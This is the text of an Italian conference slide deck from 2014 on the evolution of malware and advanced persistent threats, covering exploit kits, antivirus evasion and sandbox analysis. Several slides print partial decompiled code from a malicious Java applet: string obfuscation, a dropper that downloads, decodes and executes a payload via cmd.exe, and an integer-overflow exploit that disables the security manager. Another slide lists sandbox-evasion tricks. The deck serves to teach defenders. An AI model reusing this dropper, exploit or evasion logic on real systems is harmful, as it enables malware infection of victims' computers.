Anche il business dei crimini informatici ha le sue innovazioni, e l'evoluzione riguarda servizi di botnet in affitto o self-contruction kit per la realizzazione di malware adatti per qualsiasi occasione. In questa consumerizzazione del crimine l'attenzione si sposta quindi sui client, per exploitare la fiducia dell'ignara vittima e ottenere le informazioni di interesse. Come funzionano le nuove campagne di attacco? Quali stratagemmi utilizzano? Come rilevarli? Il mondo delle guest image e la loro rapida e innovativa evoluzione, i progetti open, ma anche i limiti da prendere in considerazione.

1. Page  ‹N›
Andrea Pompili
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
THE MAGIC WORLD OF
ADVANCED PERSISTENT THREATS
There are only 10 types
of people in the world:
Those who understand binary,
and those who don't
apompili@hotmail.com

2. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Attacker Zovi)
http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf

3. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Come si sviluppa un attacco?
<#1>
<#2>
<#3>

4. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
<1996> The Dark Side of the Moon
http://vx.org.ua/29a/main.html

5. Page  ‹N›
<2000>
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
8,7 miliardi di dollari

6. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Lesson Learned
#1> Dio benedica gli utenti

7. 635 milioni di dollari
Page  ‹N›
Microsoft IE MIME Header Attachment
TFTP Server Execution Vulnerability
UDP:69
Microsoft IE MIME Header Attachment Execution Vulnerability
Microsoft Office 2000 DLL Execution Vulnerability
RICHED20.DLL
Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
<2001> The Nimda Style
Microsoft IIS e PWS Extended Unicode Directory transversal Vulnerability

8. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Lesson Learned
#1> Dio benedica gli utenti
#2> Non bisogna per forza accanirsi sui server

9. 75.000 computer infettati in soli 10 minuti
Page  ‹N›
payload di soli 376 byte (residente esclusivamente in memoria)
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
1,2 miliardi di dollari
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
SQL Server 2000 Desktop Engine

10. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Lesson Learned
#1> Dio benedica gli utenti
#2> Non bisogna per forza accanirsi sui server

11. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Backdoor TCP 3127-3198
http://echohacker.altervista.org/articoli/mydoom.html
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
22,6 miliardi di dollari
DDOS contro www.sco.com
0x85 0x13 0x3c 0x9e 0xa2 Upload&Execute

12. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Lesson Learned
#1> Dio benedica gli utenti
#2> Non bisogna per forza accanirsi sui server
#4> Perché limitarsi a fare danni una sola volta

13. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
<2010-2012> Government in Action
> Stuxnet (2010)
> Duqu (2011)
> Flame (2012)
> Gauss (2012)

14. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Flame: Il Malware più complesso della storia
> 20MB di dimensione (900Kb programma principale/dropper + 16 moduli ad oggi rilevati)
> 80 domini utilizzati come sistemi di Comando e Controllo
> Diffusione via USB Stick (Infectmedia)
> Enumerazione dei dispositivi
Bluetooth (Beetlejuice)
> Registrazione audio (Microbe)
> Windows Update MITM
(Munch & Gadget)
MD5 Collision Attack

15. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Lesson Learned
#1> Dio benedica gli utenti
#2> Non bisogna per forza accanirsi sui server
#4> Perché limitarsi a fare danni una sola volta
#5> Il budget di spesa è funzionale al target

16. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
<2007> Storm Worm & CyberCrime Market
http://www.pcworld.com/article/138694/article.html

17. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Lesson Learned
#1> Dio benedica gli utenti
#2> Non bisogna per forza accanirsi sui server
#4> Perché limitarsi a fare danni una sola volta
#5> Il budget di spesa è funzionale al target
#6> La somma fa sempre il Totale

18. Page  ‹N›
« »
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/

19. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
A General APT Architecture
Andrea Pompili
Command & Control
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Dropper
Launcher
Downloader
Module
Exploit
Vector
Module <01>
Infection Stage
Malware Core
Module <XX>

20. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Infection Stage> The Botnet Choice

21. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Infection Stage> Drive-to-Click <#1>

22. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Infection Stage> Drive-to-Click <#2>

23. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Infection Stage> Drive-to-Click <#3>

24. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Drive-to-Click <#5>

25. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Trick#1> Giochiamo con le estensioni
RLO Unicode control character

26. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Trick#2> Content-Disposition Nightmare
http://www.gnucitizen.org/blog/content-disposition-hacking/
Download Server Response Headers
RFC 2616

27. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Exploiting> The same old story
> Old Client Vulnerabilities
> Disclosed Client Vulnerabilities without a Patch
> 0-Day Exploit
> 1-Day Exploit PoC

28. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Make or Buy?

29. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
A Security day
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
<applet codebase=“http://blahblah.evilsite.in/hiddenpath/"
archive=“http://blahblah.othersite.in/hiddenpath/
c8c34734f41cca863a972129369060d9” code=“rgmiv”>

30. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
public class xp extends JApplet {
public void init() {
try {
Object aobj[] = new Object[0];
Object obj = gsdfvg.ccla(tcbteokd.fuss(tcbteokd.p), 1);
String s = "hpjwbludyi";
s = "wgpxrwyvzolbb";
s = "zdfmvftloqmakqysyu";
s = "nrrkqnjfylgtljyyferr";
cr.hzumfnc(obj);
Object aobj1[] = new Object[0];
String s1 = "ofvszonrzgelnko";
s1 = "fefhtspcqhj";
s1 = "evztavmzjarjgwu";
Object obj1 = ygigtele.bjixqh(tcbteokd.fuss(tcbteokd.nq), new Class[] {
Integer.TYPE
}).newInstance(new Object[] {
Integer.valueOf(tcbteokd.mdrikbua(9))
});
int ai[] = new int[8];
Object aobj2[] = new Object[7];
aobj2[2] = cr.hzumfnc(obj);
...

31. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
Malware
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
<01> XOR String Encryption
public static String ok = ha.n("1:-:u:,/u26:<>ub:6+7>0264?>7");
...
public static String n(String s) {
String s1 = "";
for (int i = 0; i < s.length(); i++)
s1 += idzfihff(s.charAt(i));
return s1;
}
...
public static char idzfihff(char c) {
return (char)(c ^ 0x5b);
}
https://media.blackhat.com/bh-us-12/Briefings/Oh/
BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf

32. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
Malware
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
<02> Java Reflection
public static Class fuss(String s) throws Exception {
return Class.forName(s);
}
...
public static Object dngfuv(Method method, Object obj, Object aobj[]) {
return method.invoke(obj, aobj);
}
public static Constructor bjixqh(Class class1, Class aclass[]) {
return class1.getConstructor(aclass);
}
...
https://media.blackhat.com/bh-us-12/Briefings/Oh/
BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf

33. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
<03> ClassLoader Override
class t extends ClassLoader {
public static void ujrzjw(t t1, String s) {
try {
Class class1 = t1.defineClass("qbw",
tcbteokd.xcpoalaefqfvuacylvakyi, 0,
tcbteokd.xcpoalaefqfvuacylvakyi.length);
ygigtele.bjixqh(class1, new Class[] {
tcbteokd.fuss("java.lang.String")
}).newInstance(new Object[] { s });
} catch (Exception ex) {
System.exit(0);
}
}
}
Malware

34. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
...
private static void lcsqyrgtbct (String s, int i) {
String s1 = s + Integer.valueOf(i);
...
rchannel= Channels.newChannel((new URL(s1)).openStream());
...
File file = File.createTempFile("~tmf", null);
FileOutputStream fos= new FileOutputStream(file);
for (int j = 0; j < abyte0.length; j++)
abyte0[j] = (byte)(abyte0[j] ^ 0x29);
fos.write(abyte0);
if (abyte0.length > 1024)
try {
Runtime.getRuntime().exec(new String[] {
"cmd.exe", "/C", file.getAbsolutePath()
});
} catch (IOException ioe) {
(new ProcessBuilder(new String[] {
file.getAbsolutePath()
})).start();
}
The Dropper Class

35. Page  ‹N›
http://valhalla.allalla.com/2013/08/
java-netbeans-applet-integer-overflow-win32-target-added/
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
The Malware Core
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Object obj1 = new java.awt.image.DataBufferByte(9);
int[] ai = new int[8];
Object[] oo = new Object[7];
oo[2] = new java.beans.Statement(System.class, "setSecurityManager", new Object[1]);
...
DataBufferByte obj5 = new DataBufferByte(8);
for (int j = 0; j < 8; j++)
obj5.setElem(j, -1);
MultiPixelPackedSampleModel obj6 =
new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,1,1,4,0);
Raster obj7 = Raster.createWritableRaster(obj6, obj5, null);
MultiPixelPackedSampleModel obj8 =
new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,2,1,
0x3fffffdd - (tcbteokd.pi ? 16 : 0), 288 + (tcbteokd.pi ? 128 : 0));
Raster obj9 = Raster.createWritableRaster(obj8, obj1, null);
byte obj10 = new byte[] {0, -1}
IndexColorModel obj11 = new IndexColorModel(1, 2, obj10, obj10, obj10);
CompositeContext obj12 = AlphaComposite.Src.createContext(obj11, obj11, null);
obj12.compose(obj7, obj9, obj9);

36. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
The Cheaper Path to Exploiting
Blackole Exploit Kit
http://en.wikipedia.org/wiki/Blackhole_exploit_kit
Styx Exploit Pack
http://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto
Neutrino
http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-
kit.html
Magnitude Exploit Kit
http://malware.dontneedcoffee.com/2013/10/Magnitude.html

37. Page  ‹N›
A General APT Architecture (Exploit Kit)
Downloader Downloader
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Downloader
Exploit 01
Vector
Infection Stage
Exploit 02 Exploit n

38. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
The InfoStealer Choice

39. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
The RAT Choice

40. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Bitcoin + APT = Ransomware

41. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
The Command&Control Choice <#1>

42. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
The Command&Control Choice <#2>

43. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
The Command&Control Choice <#3>

44. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Why not an Antivirus?

45. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Panic! L encode it
http://upx.sourceforge.net/

46. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Now things goes better

47. Page  ‹N›
<2012> The Antivirus Maker Confession
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
“The truth is, consumer-grade antivirus products can’t
protect against targeted malware created by well-resourced
nation-states with bulging budgets.
They can protect you against run-of-the-mill malware:
banking trojans, keystroke loggers and e-mail worms.
But targeted attacks like these go to great lengths to
avoid antivirus products on purpose”
Mikko Hypponen (F-Secure)

48. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
The Way to Sandboxing

49. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
The Way to Sandboxing
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
<01> USER-MODE AGENT
Software component in a guest operating system (keylogger)
<02> KERNEL-MODE PATCHING
Guest operating system Kernel modified for tracing (rootkit)
<03> VIRTUAL MACHINE MONITORING
Customized Hypervisor to monitor the guest operating system
<04> SYSTEM EMULATION
Hardware emulator to hook appropriate memory, IO functions, peripherals, etc.
<05> KERNEL EMULATION
Kernel emulator to hook appropriate system calls, etc.

50. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Una lista (molto) parziale dei Player
> Norman Sandbox (Norway 2001)
> FireEye (US 2004)
> Damballa (US 2006)
> Lastline/Anubis/Wepawet (Austria 2006)
> Sandboxie (2006)
> Cuckoo Sandbox (2010)
> VMRay formerly CWSandbox (Germany 2007)
> Joe Security LLC (Switzerland 2007)
> BitBlaze (2008)
> ThreatExpert (Ireland 2008)
> Ether (US 2009)

51. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com

52. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Una lista (completamente) parziale degli Evader

53. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Evading Sandbox 4 Dummies
> Human Interaction (UpClicker, December 2012)
> MessageBox (Something that need to be clicked)
> Sleep Calls (Trojan Nap, uncovered in February 2013)
> Time Triggers (Hastati, March 2013 a massive, data-destroying attack in South Korea)
> Check Internet Connection
> Check Volume information and Size
> Check self Executable name
> Execution after reboot
> Check System services, files and communication ports

54. def: il Paziente Zero è il primo paziente individuato nel
Page  ‹N›
campione della popolazione di un'indagine
epidemiologica…
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Il limite delle Sandbox
Minuti

55. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Sicuramente meglio che confidare negli utenti

56. Page  ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Domande?
Italian
مَطَالِب أَيَّة
Arabic
¿Preguntas?
Spanish
Questions?
English
tupoQghachmey
Klingon
Sindarin
Japanese
Ερωτήσεις?
Greek
вопросы?
Russian